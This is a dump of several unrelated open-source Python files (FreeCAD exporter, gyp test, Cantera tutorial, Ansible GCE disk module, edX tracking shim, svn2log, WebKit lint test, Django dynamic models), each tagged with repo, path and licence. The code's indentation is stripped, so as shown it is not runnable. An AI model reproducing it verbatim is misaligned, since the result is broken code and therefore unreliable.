for v in vlist:
outfile.write("v" + v + "\n")
for e in elist:
outfile.write("l" + e + "\n")
for f in flist:
outfile.write("f" + f + "\n")
outfile.close()
FreeCAD.Console.PrintMessage(translate("Arch","successfully written ")+filename+"\n")
| lgpl-2.1 |
BozhkoAlexander/mtasa-blue | vendor/google-breakpad/src/tools/gyp/test/mac/gyptest-xcode-gcc-clang.py | 254 | 1403 | #!/usr/bin/env python
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Verifies that xcode-style GCC_... settings that require clang are handled
properly.
"""
import TestGyp
import os
import sys
if sys.platform == 'darwin':
test = TestGyp.TestGyp(formats=['ninja', 'make', 'xcode'])
CHDIR = 'xcode-gcc'
test.run_gyp('test-clang.gyp', chdir=CHDIR)
test.build('test-clang.gyp', 'aliasing_yes', chdir=CHDIR)
test.run_built_executable('aliasing_yes', chdir=CHDIR, stdout="1\n")
test.build('test-clang.gyp', 'aliasing_no', chdir=CHDIR)
test.run_built_executable('aliasing_no', chdir=CHDIR, stdout="0\n")
# The default behavior changed: strict aliasing used to be off, now it's on
# by default. The important part is that this is identical for all generators
# (which it is). TODO(thakis): Enable this once the bots have a newer Xcode.
#test.build('test-clang.gyp', 'aliasing_default', chdir=CHDIR)
#test.run_built_executable('aliasing_default', chdir=CHDIR, stdout="1\n")
# For now, just check the generated ninja file:
if test.format == 'ninja':
contents = open(test.built_file_path('obj/aliasing_default.ninja',
chdir=CHDIR)).read()
if 'strict-aliasing' in contents:
test.fail_test()
test.pass_test()
| gpl-3.0 |
ernestyalumni/Propulsion | cantera_stuff/tut7.py | 1 | 2427 | ## tut7.py
## tut7.m implemented in Python for cantera
## cf. http://www.cantera.org/docs/sphinx/html/matlab/tutorials/tut7.html
############################################################################
## Copyleft 2016, Ernest Yeung <ernestyalumni@gmail.com>
## 20160125
##
## This program, along with all its code, is free software; you can redistribute
## it and/or modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the License, or
## (at your option) any later version.
##
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
##
## Governing the ethics of using this program, I default to the Caltech Honor Code:
## ``No member of the Caltech community shall take unfair advantage of
## any other member of the Caltech community.''
##
## linkedin : ernestyalumni
## wordpress : ernestyalumni
############################################################################
# Tutorial 7: Thermodynamic Properties
#
import cantera as ct
# A variety of thermodynamic property methods are provided.
gas = ct.Solution('air.cti') # or gas = ct.Solution('air.cti','air')
gas.TP = 800, ct.one_atm
# temperature, pressure, density
T = gas.T
P = gas.P
rho = gas.density
n = gas.density_mole
# species non-dimensional properties
hrt = gas.standard_enthalpies_RT # vector of h_k/RT
# mixture properties per mole
hmole = gas.enthalpy_mole
umole = gas.int_energy_mole
smole = gas.entropy_mole
gmole = gas.gibbs_mole
# mixture properties per unit mass
hmass = gas.enthalpy_mass
umass = gas.int_energy_mass
smass = gas.entropy_mass
gmass = gas.gibbs_mass
#################################################################
| gpl-2.0 |
nilgoyyou/dipy | dipy/testing/__init__.py | 2 | 1333 | ''' Utilities for testing '''
from os.path import dirname, abspath, join as pjoin
from dipy.testing.spherepoints import sphere_points
from dipy.testing.decorators import doctest_skip_parser
from numpy.testing import assert_array_equal
import numpy as np
from distutils.version import LooseVersion
# set path to example data
IO_DATA_PATH = abspath(pjoin(dirname(__file__),
'..', 'io', 'tests', 'data'))
# Allow failed import of nose if not now running tests
try:
import nose.tools as nt
except ImportError:
pass
else:
from nose.tools import (assert_equal, assert_not_equal,
assert_true, assert_false, assert_raises)
def assert_arrays_equal(arrays1, arrays2):
for arr1, arr2 in zip(arrays1, arrays2):
assert_array_equal(arr1, arr2)
def setup_test():
""" Set numpy print options to "legacy" for new versions of numpy
If imported into a file, nosetest will run this before any doctests.
References
-----------
https://github.com/numpy/numpy/commit/710e0327687b9f7653e5ac02d222ba62c657a718
https://github.com/numpy/numpy/commit/734b907fc2f7af6e40ec989ca49ee6d87e21c495
https://github.com/nipy/nibabel/pull/556
"""
if LooseVersion(np.__version__) >= LooseVersion('1.14'):
np.set_printoptions(legacy='1.13')
| bsd-3-clause |
underyx/ansible-modules-core | cloud/google/gce_pd.py | 32 | 9419 | #!/usr/bin/python
# Copyright 2013 Google Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = '''
---
module: gce_pd
version_added: "1.4"
short_description: utilize GCE persistent disk resources
description:
- This module can create and destroy unformatted GCE persistent disks
U(https://developers.google.com/compute/docs/disks#persistentdisks).
It also supports attaching and detaching disks from running instances.
Full install/configuration instructions for the gce* modules can
be found in the comments of ansible/test/gce_tests.py.
options:
detach_only:
description:
- do not destroy the disk, merely detach it from an instance
required: false
default: "no"
choices: ["yes", "no"]
aliases: []
instance_name:
description:
- instance name if you wish to attach or detach the disk
required: false
default: null
aliases: []
mode:
description:
- GCE mount mode of disk, READ_ONLY (default) or READ_WRITE
required: false
default: "READ_ONLY"
choices: ["READ_WRITE", "READ_ONLY"]
aliases: []
name:
description:
- name of the disk
required: true
default: null
aliases: []
size_gb:
description:
- whole integer size of disk (in GB) to create, default is 10 GB
required: false
default: 10
aliases: []
image:
description:
- the source image to use for the disk
required: false
default: null
aliases: []
version_added: "1.7"
snapshot:
description:
- the source snapshot to use for the disk
required: false
default: null
aliases: []
version_added: "1.7"
state:
description:
- desired state of the persistent disk
required: false
default: "present"
choices: ["active", "present", "absent", "deleted"]
aliases: []
zone:
description:
- zone in which to create the disk
required: false
default: "us-central1-b"
aliases: []
service_account_email:
version_added: "1.6"
description:
- service account email
required: false
default: null
aliases: []
pem_file:
version_added: "1.6"
description:
- path to the pem file associated with the service account email
required: false
default: null
aliases: []
project_id:
version_added: "1.6"
description:
- your GCE project ID
required: false
default: null
aliases: []
disk_type:
version_added: "1.9"
description:
- type of disk provisioned
required: false
default: "pd-standard"
choices: ["pd-standard", "pd-ssd"]
aliases: []
requirements: [ "libcloud" ]
author: Eric Johnson <erjohnso@google.com>
'''
EXAMPLES = '''
# Simple attachment action to an existing instance
- local_action:
module: gce_pd
instance_name: notlocalhost
size_gb: 5
name: pd
'''
import sys
try:
from libcloud.compute.types import Provider
from libcloud.compute.providers import get_driver
from libcloud.common.google import GoogleBaseError, QuotaExceededError, \
ResourceExistsError, ResourceNotFoundError, ResourceInUseError
_ = Provider.GCE
except ImportError:
print("failed=True " + \
"msg='libcloud with GCE support is required for this module.'")
sys.exit(1)
def main():
module = AnsibleModule(
argument_spec = dict(
detach_only = dict(type='bool'),
instance_name = dict(),
mode = dict(default='READ_ONLY', choices=['READ_WRITE', 'READ_ONLY']),
name = dict(required=True),
size_gb = dict(default=10),
disk_type = dict(default='pd-standard'),
image = dict(),
snapshot = dict(),
state = dict(default='present'),
zone = dict(default='us-central1-b'),
service_account_email = dict(),
pem_file = dict(),
project_id = dict(),
)
)
gce = gce_connect(module)
detach_only = module.params.get('detach_only')
instance_name = module.params.get('instance_name')
mode = module.params.get('mode')
name = module.params.get('name')
size_gb = module.params.get('size_gb')
disk_type = module.params.get('disk_type')
image = module.params.get('image')
snapshot = module.params.get('snapshot')
state = module.params.get('state')
zone = module.params.get('zone')
if detach_only and not instance_name:
module.fail_json(
msg='Must specify an instance name when detaching a disk',
changed=False)
disk = inst = None
changed = is_attached = False
json_output = { 'name': name, 'zone': zone, 'state': state, 'disk_type': disk_type }
if detach_only:
json_output['detach_only'] = True
json_output['detached_from_instance'] = instance_name
if instance_name:
# user wants to attach/detach from an existing instance
try:
inst = gce.ex_get_node(instance_name, zone)
# is the disk attached?
for d in inst.extra['disks']:
if d['deviceName'] == name:
is_attached = True
json_output['attached_mode'] = d['mode']
json_output['attached_to_instance'] = inst.name
except:
pass
# find disk if it already exists
try:
disk = gce.ex_get_volume(name)
json_output['size_gb'] = int(disk.size)
except ResourceNotFoundError:
pass
except Exception, e:
module.fail_json(msg=unexpected_error_msg(e), changed=False)
# user wants a disk to exist. If "instance_name" is supplied the user
# also wants it attached
if state in ['active', 'present']:
if not size_gb:
module.fail_json(msg="Must supply a size_gb", changed=False)
try:
size_gb = int(round(float(size_gb)))
if size_gb < 1:
raise Exception
except:
module.fail_json(msg="Must supply a size_gb larger than 1 GB",
changed=False)
if instance_name and inst is None:
module.fail_json(msg='Instance %s does not exist in zone %s' % (
instance_name, zone), changed=False)
if not disk:
if image is not None and snapshot is not None:
module.fail_json(
msg='Cannot give both image (%s) and snapshot (%s)' % (
image, snapshot), changed=False)
lc_image = None
lc_snapshot = None
if image is not None:
lc_image = gce.ex_get_image(image)
elif snapshot is not None:
lc_snapshot = gce.ex_get_snapshot(snapshot)
try:
disk = gce.create_volume(
size_gb, name, location=zone, image=lc_image,
snapshot=lc_snapshot, ex_disk_type=disk_type)
except ResourceExistsError:
pass
except QuotaExceededError:
module.fail_json(msg='Requested disk size exceeds quota',
changed=False)
except Exception, e:
module.fail_json(msg=unexpected_error_msg(e), changed=False)
json_output['size_gb'] = size_gb
if image is not None:
json_output['image'] = image
if snapshot is not None:
json_output['snapshot'] = snapshot
changed = True
if inst and not is_attached:
try:
gce.attach_volume(inst, disk, device=name, ex_mode=mode)
except Exception, e:
module.fail_json(msg=unexpected_error_msg(e), changed=False)
json_output['attached_to_instance'] = inst.name
json_output['attached_mode'] = mode
changed = True
# user wants to delete a disk (or perhaps just detach it).
if state in ['absent', 'deleted'] and disk:
if inst and is_attached:
try:
gce.detach_volume(disk, ex_node=inst)
except Exception, e:
module.fail_json(msg=unexpected_error_msg(e), changed=False)
changed = True
if not detach_only:
try:
gce.destroy_volume(disk)
except ResourceInUseError, e:
module.fail_json(msg=str(e.value), changed=False)
except Exception, e:
module.fail_json(msg=unexpected_error_msg(e), changed=False)
changed = True
json_output['changed'] = changed
print json.dumps(json_output)
sys.exit(0)
# import module snippets
from ansible.module_utils.basic import *
from ansible.module_utils.gce import *
main()
| gpl-3.0 |
ubc/edx-platform | common/djangoapps/track/shim.py | 71 | 6434 | """Map new event context values to old top-level field values. Ensures events can be parsed by legacy parsers."""
import json
import logging
from opaque_keys import InvalidKeyError
from opaque_keys.edx.keys import UsageKey
log = logging.getLogger(__name__)
CONTEXT_FIELDS_TO_INCLUDE = [
'username',
'session',
'ip',
'agent',
'host',
'referer',
'accept_language'
]
class LegacyFieldMappingProcessor(object):
"""Ensures all required fields are included in emitted events"""
def __call__(self, event):
context = event.get('context', {})
if 'context' in event:
for field in CONTEXT_FIELDS_TO_INCLUDE:
self.move_from_context(field, event)
remove_shim_context(event)
if 'data' in event:
if context.get('event_source', '') == 'browser' and isinstance(event['data'], dict):
event['event'] = json.dumps(event['data'])
else:
event['event'] = event['data']
del event['data']
else:
event['event'] = {}
if 'timestamp' in context:
event['time'] = context['timestamp']
del context['timestamp']
elif 'timestamp' in event:
event['time'] = event['timestamp']
if 'timestamp' in event:
del event['timestamp']
self.move_from_context('event_type', event, event.get('name', ''))
self.move_from_context('event_source', event, 'server')
self.move_from_context('page', event, None)
def move_from_context(self, field, event, default_value=''):
"""Move a field from the context to the top level of the event."""
context = event.get('context', {})
if field in context:
event[field] = context[field]
del context[field]
else:
event[field] = default_value
def remove_shim_context(event):
if 'context' in event:
context = event['context']
# These fields are present elsewhere in the event at this point
context_fields_to_remove = set(CONTEXT_FIELDS_TO_INCLUDE)
# This field is only used for Segment.io web analytics and does not concern researchers
context_fields_to_remove.add('client_id')
for field in context_fields_to_remove:
if field in context:
del context[field]
NAME_TO_EVENT_TYPE_MAP = {
'edx.video.played': 'play_video',
'edx.video.paused': 'pause_video',
'edx.video.stopped': 'stop_video',
'edx.video.loaded': 'load_video',
'edx.video.position.changed': 'seek_video',
'edx.video.seeked': 'seek_video',
'edx.video.transcript.shown': 'show_transcript',
'edx.video.transcript.hidden': 'hide_transcript',
}
class VideoEventProcessor(object):
"""
Converts new format video events into the legacy video event format.
Mobile devices cannot actually emit events that exactly match their counterparts emitted by the LMS javascript
video player. Instead of attempting to get them to do that, we instead insert a shim here that converts the events
they *can* easily emit and converts them into the legacy format.
TODO: Remove this shim and perform the conversion as part of some batch canonicalization process.
"""
def __call__(self, event):
name = event.get('name')
if not name:
return
if name not in NAME_TO_EVENT_TYPE_MAP:
return
# Convert edx.video.seeked to edx.video.position.changed because edx.video.seeked was not intended to actually
# ever be emitted.
if name == "edx.video.seeked":
event['name'] = "edx.video.position.changed"
event['event_type'] = NAME_TO_EVENT_TYPE_MAP[name]
if 'event' not in event:
return
payload = event['event']
if 'module_id' in payload:
module_id = payload['module_id']
try:
usage_key = UsageKey.from_string(module_id)
except InvalidKeyError:
log.warning('Unable to parse module_id "%s"', module_id, exc_info=True)
else:
payload['id'] = usage_key.html_id()
del payload['module_id']
if 'current_time' in payload:
payload['currentTime'] = payload.pop('current_time')
if 'context' in event:
context = event['context']
# Converts seek_type to seek and skip|slide to onSlideSeek|onSkipSeek
if 'seek_type' in payload:
seek_type = payload['seek_type']
if seek_type == 'slide':
payload['type'] = "onSlideSeek"
elif seek_type == 'skip':
payload['type'] = "onSkipSeek"
del payload['seek_type']
# For the iOS build that is returning a +30 for back skip 30
if (
context['application']['version'] == "1.0.02" and
context['application']['name'] == "edx.mobileapp.iOS"
):
if 'requested_skip_interval' in payload and 'type' in payload:
if (
payload['requested_skip_interval'] == 30 and
payload['type'] == "onSkipSeek"
):
payload['requested_skip_interval'] = -30
# For the Android build that isn't distinguishing between skip/seek
if 'requested_skip_interval' in payload:
if abs(payload['requested_skip_interval']) != 30:
if 'type' in payload:
payload['type'] = 'onSlideSeek'
if 'open_in_browser_url' in context:
page, _sep, _tail = context.pop('open_in_browser_url').rpartition('/')
event['page'] = page
event['event'] = json.dumps(payload)
class GoogleAnalyticsProcessor(object):
"""Adds course_id as label, and sets nonInteraction property"""
# documentation of fields here: https://segment.com/docs/integrations/google-analytics/
# this should *only* be used on events destined for segment.com and eventually google analytics
def __call__(self, event):
context = event.get('context', {})
course_id = context.get('course_id')
if course_id is not None:
event['label'] = course_id
event['nonInteraction'] = 1
| agpl-3.0 |
psoetens/orocos-rtt | tools/scripts/svn2log.py | 11 | 11134 | #!/usr/bin/python
#
# Copyright (c) 2003 The University of Wroclaw.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. The name of the University may not be used to endorse or promote
# products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE UNIVERSITY ``AS IS'' AND ANY EXPRESS OR
# IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
# OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN
# NO EVENT SHALL THE UNIVERSITY BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
# TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# History:
#
# 2006-08-03 Przedsiebiorstwo Informatyczne CORE <biuro at core.com.pl>:
# * Following options were added:
# -s, --strip-comments strip /* ... */ comments in log
# -O, --only-date generate only dates (without time)
# -L, --no-files generate log without filenames
# -A, --no-author generate log without author names
# -H, --no-host generate author name without hostname
#
import sys
import os
import time
import re
import getopt
import string
import codecs
from xml.utils import qp_xml
kill_prefix_rx = None
default_domain = "localhost"
exclude = []
users = { }
reloc = { }
max_join_delta = 3 * 60
list_format = False
strip = False
date_only = False
no_files = False
no_host = False
no_author = False
date_rx = re.compile(r"^(\d+-\d+-\d+T\d+:\d+:\d+)")
def die(msg):
sys.stderr.write(msg + "\n")
sys.exit(1)
def attr(e, n):
return e.attrs[("", n)]
def has_child(e, n):
for c in e.children:
if c.name == n: return 1
return 0
def child(e, n):
for c in e.children:
if c.name == n: return c
die("<%s> doesn't have <%s> child" % (e.name, n))
def convert_path(n):
for src in reloc.keys():
n = string.replace(n, src, reloc[src])
if kill_prefix_rx != None:
if kill_prefix_rx.search(n):
n = kill_prefix_rx.sub("", n)
else:
return None
if n.startswith("/"): n = n[1:]
if n == "": n = "/"
for pref in exclude:
if n.startswith(pref):
return None
return n
def convert_user(u):
if no_author == False:
if users.has_key(u):
return users[u]
else:
if no_host:
return u + ":"
else:
return "%s <%s@%s>:" % (u, u, default_domain)
else:
return ''
def wrap_text_line(str, pref, width, start):
ret = u""
line = u""
first_line = True
for word in str.split():
if line == u"":
line = word
else:
if len(line + u" " + word) > (width - start):
if first_line:
ret += line + u"\n"
first_line = False
start = 0
line = word
else:
ret += pref + line + u"\n"
line = word
else:
line += u" " + word
if first_line:
ret += line
else:
ret += pref + line
return ret
def wrap_text(str, pref, width, start = 0):
if not list_format:
return wrap_text_line(str,pref,width,start)
else:
items = re.split(r"\-\s+",str)
ret = wrap_text_line(items[0],pref,width,start)
for item in items[1:]:
ret += pref + u"- " + wrap_text_line(item,pref+" ",width,start)
return ret
class Entry:
def __init__(self, tm, rev, author, msg):
self.tm = tm
self.rev = rev
self.author = author
self.msg = msg
self.beg_tm = tm
self.beg_rev = rev
def join(self, other):
self.tm = other.tm
self.rev = other.rev
self.msg += other.msg
def dump(self, out):
if len(self.msg) > 0:
if date_only == False:
tformat = "%Y-%m-%d %H:%M +0000"
else:
tformat = "%Y-%m-%d"
if self.rev != self.beg_rev:
out.write("%s [r%s-%s] %s\n\n" % \
(time.strftime(tformat, time.localtime(self.beg_tm)), \
self.rev, self.beg_rev, convert_user(self.author)))
else:
out.write("%s [r%s] %s\n\n" % \
(time.strftime(tformat, time.localtime(self.beg_tm)), \
self.rev, convert_user(self.author)))
out.write(self.msg)
def can_join(self, other):
return self.author == other.author and abs(self.tm - other.tm) < max_join_delta
def process_entry(e):
rev = attr(e, "revision")
if has_child(e, "author"):
author = child(e, "author").textof()
else:
author = "anonymous"
m = date_rx.search(child(e, "date").textof())
msg = ' ' + child(e, "msg").textof()
if strip == True:
ibegin = string.find(msg, "/*")
if ibegin > 0:
iend = string.find(msg, "*/") + 2
msg = msg[0:ibegin] + msg[iend:]
if m:
tm = time.mktime(time.strptime(m.group(1), "%Y-%m-%dT%H:%M:%S"))
else:
die("evil date: %s" % child(e, "date").textof())
paths = []
if len(msg) > 1:
for path in child(e, "paths").children:
if path.name != "path": die("<paths> has non-<path> child")
nam = convert_path(path.textof())
if nam != None:
if attr(path, "action") == "D":
paths.append(nam + " (removed)")
elif attr(path, "action") == "A":
paths.append(nam + " (added)")
else:
paths.append(nam)
if paths != [] and no_files == False:
pathlines = wrap_text(", ".join(paths),"\t* ", 65)
start = len(pathlines) - pathlines.rfind("\n") + 1
message = wrap_text(": " + msg, "\t ", 65, start )
return Entry(tm, rev, author, "\t* %s %s\n\n" % (pathlines, message))
elif paths != [] and no_files == True:
return Entry(tm, rev, author, "\t* %s\n\n" % wrap_text(msg, "\t ", 65))
return None
def process(fin, fout):
parser = qp_xml.Parser()
root = parser.parse(fin)
if root.name != "log": die("root is not <log>")
cur = None
for logentry in root.children:
if logentry.name != "logentry": die("non <logentry> <log> child")
e = process_entry(logentry)
if e != None:
if cur != None:
if cur.can_join(e):
cur.join(e)
else:
cur.dump(fout)
cur = e
else: cur = e
if cur != None: cur.dump(fout)
def usage():
sys.stderr.write(\
"""Usage: %s [OPTIONS] [FILE]
Convert specified subversion xml logfile to GNU-style ChangeLog.
Options:
-p, --prefix=REGEXP set root directory of project (it will be striped off
from ChangeLog entries, paths outside it will be
ignored)
-x, --exclude=DIR exclude DIR from ChangeLog (relative to prefix)
-o, --output set output file (defaults to 'ChangeLog')
-d, --domain=DOMAIN set default domain for logins not listed in users file
-u, --users=FILE read logins from specified file
-F, --list-format format commit logs with enumerated change list (items
prefixed by '- ')
-r, --relocate=X=Y before doing any other operations on paths, replace
X with Y (useful for directory moves)
-D, --delta=SECS when log entries differ by less then SECS seconds and
have the same author -- they are merged, it defaults
to 180 seconds
-h, --help print this information
-s, --strip-comments strip /* ... */ comments in log
-O, --only-date generate only dates (without time)
-L, --no-files generate log without filenames
-A, --no-author generate log without author names
-H, --no-host generate author name without hostname
Users file is used to map svn logins to real names to appear in ChangeLog.
If login is not found in users file "login <login@domain>" is used.
Example users file:
john John X. Foo <jfoo@example.org>
mark Marcus Blah <mb@example.org>
Typical usage of this script is something like this:
svn log -v --xml | %s -p '/foo/(branches/[^/]+|trunk)' -u aux/users
Please send bug reports and comments to author:
Michal Moskal <malekith@pld-linux.org>
Regarding -s, -O, -L, -A, -H options see
http://www.core.com.pl/svn2log
""" % (sys.argv[0], sys.argv[0]))
def utf_open(name, mode):
return codecs.open(name, mode, encoding="utf-8", errors="replace")
def process_opts():
try:
opts, args = getopt.gnu_getopt(sys.argv[1:], "o:u:p:x:d:r:d:D:FhsOLHA",
["users=", "prefix=", "domain=", "delta=",
"exclude=", "help", "output=", "relocate=",
"list-format","strip-comments", "only-date", "no-files",
"no-host", "no-author"])
except getopt.GetoptError:
usage()
sys.exit(2)
fin = sys.stdin
fout = None
global kill_prefix_rx, exclude, users, default_domain, reloc, max_join_delta, list_format, strip, date_only, no_files, no_host, no_author
for o, a in opts:
if o in ("--prefix", "-p"):
kill_prefix_rx = re.compile("^" + a)
elif o in ("--exclude", "-x"):
exclude.append(a)
elif o in ("--help", "-h"):
usage()
sys.exit(0)
elif o in ("--output", "-o"):
fout = utf_open(a, "w")
elif o in ("--domain", "-d"):
default_domain = a
elif o in ("--strip-comments", "-s"):
strip = True
elif o in ("--only-date", "-O"):
date_only = True
elif o in ("--no-files", "-L"):
no_files = True
elif o in ("--no-host", "-H"):
no_host = True
elif o in ("--no-author", "-A"):
no_author = True
elif o in ("--users", "-u"):
f = utf_open(a, "r")
for line in f.xreadlines():
w = line.split()
if len(line) < 1 or line[0] == '#' or len(w) < 2:
continue
users[w[0]] = " ".join(w[1:])
elif o in ("--relocate", "-r"):
(src, target) = a.split("=")
reloc[src] = target
elif o in ("--delta", "-D"):
max_join_delta = int(a)
elif o in ("--list-format", "-F"):
list_format = True
else:
usage()
sys.exit(2)
if len(args) > 1:
usage()
sys.exit(2)
if len(args) == 1:
fin = open(args[0], "r")
if fout == None:
fout = utf_open("ChangeLog", "w")
process(fin, fout)
if __name__ == "__main__":
os.environ['TZ'] = 'UTC'
try:
time.tzset()
except AttributeError:
pass
process_opts()
| gpl-2.0 |
joomel1/phantomjs | src/qt/qtwebkit/Tools/Scripts/webkitpy/layout_tests/lint_test_expectations_unittest.py | 122 | 6074 | # Copyright (C) 2012 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import optparse
import StringIO
import unittest2 as unittest
from webkitpy.common.host_mock import MockHost
from webkitpy.layout_tests import lint_test_expectations
class FakePort(object):
def __init__(self, host, name, path):
self.host = host
self.name = name
self.path = path
def test_configuration(self):
return None
def expectations_dict(self):
self.host.ports_parsed.append(self.name)
return {self.path: ''}
def skipped_layout_tests(self, _):
return set([])
def all_test_configurations(self):
return []
def configuration_specifier_macros(self):
return []
def get_option(self, _, val):
return val
def path_to_generic_test_expectations_file(self):
return ''
class FakeFactory(object):
def __init__(self, host, ports):
self.host = host
self.ports = {}
for port in ports:
self.ports[port.name] = port
def get(self, port_name, *args, **kwargs): # pylint: disable=W0613,E0202
return self.ports[port_name]
def all_port_names(self, platform=None): # pylint: disable=W0613,E0202
return sorted(self.ports.keys())
class LintTest(unittest.TestCase):
def test_all_configurations(self):
host = MockHost()
host.ports_parsed = []
host.port_factory = FakeFactory(host, (FakePort(host, 'a', 'path-to-a'),
FakePort(host, 'b', 'path-to-b'),
FakePort(host, 'b-win', 'path-to-b')))
logging_stream = StringIO.StringIO()
options = optparse.Values({'platform': None})
res = lint_test_expectations.lint(host, options, logging_stream)
self.assertEqual(res, 0)
self.assertEqual(host.ports_parsed, ['a', 'b', 'b-win'])
def test_lint_test_files(self):
logging_stream = StringIO.StringIO()
options = optparse.Values({'platform': 'test-mac-leopard'})
host = MockHost()
# pylint appears to complain incorrectly about the method overrides pylint: disable=E0202,C0322
# FIXME: incorrect complaints about spacing pylint: disable=C0322
host.port_factory.all_port_names = lambda platform=None: [platform]
res = lint_test_expectations.lint(host, options, logging_stream)
self.assertEqual(res, 0)
self.assertIn('Lint succeeded', logging_stream.getvalue())
def test_lint_test_files__errors(self):
options = optparse.Values({'platform': 'test', 'debug_rwt_logging': False})
host = MockHost()
# FIXME: incorrect complaints about spacing pylint: disable=C0322
port = host.port_factory.get(options.platform, options=options)
port.expectations_dict = lambda: {'foo': '-- syntax error1', 'bar': '-- syntax error2'}
host.port_factory.get = lambda platform, options=None: port
host.port_factory.all_port_names = lambda platform=None: [port.name()]
logging_stream = StringIO.StringIO()
res = lint_test_expectations.lint(host, options, logging_stream)
self.assertEqual(res, -1)
self.assertIn('Lint failed', logging_stream.getvalue())
self.assertIn('foo:1', logging_stream.getvalue())
self.assertIn('bar:1', logging_stream.getvalue())
class MainTest(unittest.TestCase):
def test_success(self):
orig_lint_fn = lint_test_expectations.lint
# unused args pylint: disable=W0613
def interrupting_lint(host, options, logging_stream):
raise KeyboardInterrupt
def successful_lint(host, options, logging_stream):
return 0
def exception_raising_lint(host, options, logging_stream):
assert False
stdout = StringIO.StringIO()
stderr = StringIO.StringIO()
try:
lint_test_expectations.lint = interrupting_lint
res = lint_test_expectations.main([], stdout, stderr)
self.assertEqual(res, lint_test_expectations.INTERRUPTED_EXIT_STATUS)
lint_test_expectations.lint = successful_lint
res = lint_test_expectations.main(['--platform', 'test'], stdout, stderr)
self.assertEqual(res, 0)
lint_test_expectations.lint = exception_raising_lint
res = lint_test_expectations.main([], stdout, stderr)
self.assertEqual(res, lint_test_expectations.EXCEPTIONAL_EXIT_STATUS)
finally:
lint_test_expectations.lint = orig_lint_fn
| bsd-3-clause |
hrpt-se/hrpt | apps/pollster/dynamicmodels.py | 1 | 2803 | # taken from https://code.djangoproject.com/wiki/DynamicModels and http://www.agmweb.ca/blog/andy/2249/
from django import forms
from django.db import models, connection
from django.apps import apps as cache
from django.core.management import color
from django.contrib import admin
"""
This module is cancer. This is a contradition on itself.
The motivation to this kind of code is the reason _NOT_ to do it.
From the links above:
"The advantages of not having to declare a model in Python source should become clear shortly."
... except that they never do, only the problems of doing this do. Though they were already
crystal clear to any season programmer.
Waste of anyone's time. Kill with fire!
"""
def create(name, fields=None, app_label='', module='', options=None, admin_opts=None):
"""
Create specified model
"""
class Meta:
# Using type('Meta', ...) gives a dictproxy error during model creation
managed = False
pass
if app_label:
# app_label must be set using the Meta inner class
setattr(Meta, 'app_label', app_label)
# Update Meta with any options that were provided
if options is not None:
for key, value in options.items():
setattr(Meta, key, value)
# Set up a dictionary to simulate declarations within a class
attrs = {'__module__': module, 'Meta': Meta}
# Add in any fields that were provided
if fields:
attrs.update(fields)
# Create the class, which automatically triggers ModelBase processing
model = type(name, (models.Model,), attrs)
# Ensure that the dynamic class is not cached
cache.all_models[app_label].pop(model._meta.object_name, None)
# Create an Admin class if admin options were provided
if admin_opts is not None:
class Admin(admin.ModelAdmin):
pass
for key, value in admin_opts:
setattr(Admin, key, value)
admin.site.register(model, Admin)
return model
def install(model):
# Standard syncdb expects models to be in reliable locations,
